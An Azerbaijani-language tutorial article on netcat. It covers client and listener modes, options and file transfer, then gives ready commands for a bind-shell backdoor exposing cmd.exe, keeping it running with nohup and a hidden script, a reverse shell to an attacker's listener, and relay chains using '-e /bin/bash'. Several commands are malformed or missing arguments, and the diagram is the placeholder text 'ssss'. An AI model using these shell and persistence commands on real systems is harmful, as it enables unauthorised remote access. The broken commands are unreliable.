Netcat Proqramının İstifadə Ssenariləri

                             Netcat Proqramının İstifadə Ssenariləri

Netcat xakerlər tərəfindən sistemlərə icazəsiz girişi təmin etmək üçün istifadə olunan məşhur proqramlardan biridir. Netcat proqramı Windows, Linux, Solaris və s. əməliyyat sistemlərində icra edilmək imkanına malikdir. Bir çox Linux sistemləri Netcat-i distributivlərinə daxil edir.

Netcat Rejimləri

Netcat 2 rejimdə işləyə bilir:

·         Klient rejimi (Client Mode): Klient həmişə dinləyici ilə qoşulmanı başladır. Klient rejiminin bütün səhvləri standart səhvə(standard error) yönləndirilir. Klient rejiminə arqument olaraq dinləyicinin İP ünvanı və portu ötürülməlidir.

·         Dinləmə rejimi (Listener mode): Bu rejimdə dinləyici təyin edilmiş portda qoşulmanı gözləyir. Output olaraq standart output, fayl, və s. istifadə oluna bilər. Arqument olaraq yalnız dinləmə portunun nömrəsi qeyd edilməlidir.

Netcat Əmrlərinin Opsiyaları

 Netcat bir sıra opsiyalarla istifadə olunur. Ümumi əmr sintaksisi belədir:

nc [opsiya] [hədəf_sistem] [port]

Aşağıdakılar Netcat-in əsas opsiyalarıdır:

·         -l: Netcat-i dinləyici rejimə keçirdir.

·         -u: Netcat-i TCP rejimdən UDP rejimə keçirdir.

·         -p: Klient və ya Dinləyici rejimdə portu təyin edir.

·         -e: Müvəffəqiyyətli qoşulmadan sonra icra ediləcək əmrləri təyin edir.

·         -L: Davamlı dinləyici yaradılır. Yalnız Windows üçün nəzərdə tutulmuşdur.

·         -w: Timeout qiymətini təyin etmək üçün istifadə edilir.

·         -v: Qoşulma barədə əlavə məlumatların verilməsi rejimi.

Netcat-in İstifadələri

Netcat-in sintaksisini və işləmə rejimlərini aydınlaşdırdıqdan sonra, bir neçə istifadə ssenarisini gözdən keçirək.

Məlumatların ötürülməsi

Netcat komputerlər arası faylların ötürülməsi üçün istifadə oluna bilər. Netcat həm TCP, həm də UDP protokollarını dəstəkləyir. Məlumat ötürülməsi 2 cür həyata keçirilə bilər:

1) Klient dinləyicidə olan faylı öz komputerinə ötürür. Bu halda aşağıdakı

əmrlər icra olunur:

  Dinləyicidə: nc -l -p 6789 < fayl.txt

  Klientdə: nc 127.0.0.1 6789 > fayl.txt

2) Klient faylı dinləyiciyə ötürür. Bu halda isə aşağıdakı əmrlər icra olunur:

  Dinləyicidə: nc -l -p 4321 > fayl.txt

  Klientdə: nc -l -p 4321 < fayl.txt

Backdoor-un yaradılması

Xakerlər tərəfindən ən çox istifadə olunan imkanlardan biri sistemlərdə backdoor-un yaradılmasıdır.

  Dinləyicidə(Server): nc -l -p 1234 -e cmd.exe

  Klientdə(Xaker): nc 127.0.0.1 1234

Qeyd edək ki, -e opsiyası müvəffəqiyyətli qoşulma baş verdikdə əmr icra etmək üçün istifadə edilir. Linux sistemlərində cari istifadəçi sistemdən çıxış etdikdə belə  backdoor-un işinin davam edilməsini təmin etmək olar. Bunun üçün nohup əmrindən istifadə edilməlidir. İlk olaraq bütün icra ediləcək kod bir fayla yazılmalı və icazələr təyin edilməlidir.

  Chmod 555 .sh

  nohup ./.sh &

Reverse Shell

Netcat, həmçinin server sessiyasının serverdən xakerə ötürülməsini təmin edə bilər, və bu halda özü klient rolunu oynayır.

  Dinləyicidə(Xaker): nc -l -p 1234

  Klientdə(Server): nc 127.0.0.1 1234 -e cmd.exe

Qeyd edək ki, backdoor misalında klient(xaker) serverə qoşulmağa çalışırdı. Bu halda isə server əks bağlantı yaratmağa çalışır.

Relay (Translasiya)

Netcat qoşulmanı(potensial hücumu) bir komputerdən digərinə ötürməni təmin edə bilər. Zəncirdəki hər komputer relay rolunu oynayır. Aşağıdakı əmr vasitəsilə neçə ədəd relay olduğunu təyin etmək olar.

  nc -l -l | nc

Aşağıdakı diaqram vasitəsilə relay-lərin necə işlədiyinə şahid olmaq olar.

ssss

Relay-lər bir neçə üsulla yaradıla bilər. Ən populyar üsul Windows mühitində “batch” faylların yaradılması, Unix və Linux mühitində isə FİFO-nun istifadəsidir.

Windows sistemində relay.bat faylı yaradın və daxilində “nc ” yazın. Relay yaratmaq üçün konsolda

  nc -l -p 4567 -e relay.bat

yazın. Bu əmr, Netcat-i 4567-ci portda dinləmə rejiminə keçirəcək və qoşulma olduğu zaman bütün input-u relay.bat faylında olan “nc ” əmrinin ardınca ötürəcək.

Linux/Unix üçün isə backpipe adlandırılan xüsusi FİFO fayl tipindən istifadə edilir.

                mkfifo backpipe

Relay üçün isə məsələn:

                nc -l 5902  0<backpipe | nc 10.1.1.116 5902 1>backpipe

Qeyd edək ki, yuxarıdakılar  nc -l -p -e /bin/bash | nc next-server-hop ilə ekvivalentdir. Sadəcə olaraq bir çox Linux və Unix sistemlərində Netcat-in kompilasiyası zamanı “-e” opsiyası aktiv olmur.

Nəticə

Bu məqalədə biz Netcat proqramının bir neçə populyar istifadə ssenariləri barədə öyrəndik. Bura həm adi istifadəçilərin, həm də xakerlərin istifadə etdiyi üsullar daxil edilmişdir. Digər imkanlara portların skan edilməsi, protokolların testi və s. daxildir.

Səs: +20. Bəyənilsin Zəifdir

Müəllif: Murad Qurbanov

Şərhlər ( Netcat Proqramının İstifadə Ssenariləri )

  1. Təşəkkürlər Murad bəy.

Şərh yazın